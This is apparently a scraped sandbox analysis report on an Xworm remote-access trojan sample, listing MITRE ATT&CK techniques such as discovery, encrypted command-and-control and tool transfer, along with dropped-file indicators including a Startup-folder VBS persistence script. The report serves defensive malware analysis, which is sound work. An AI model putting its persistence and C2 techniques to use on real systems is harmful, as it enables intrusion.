Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report pictures and specifications.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\IsPrimitive.exe

C:\Users\user\AppData\Roaming\IsPrimitive.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsPrimitive.vbs

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Windows Analysis Report
pictures and specifications.exe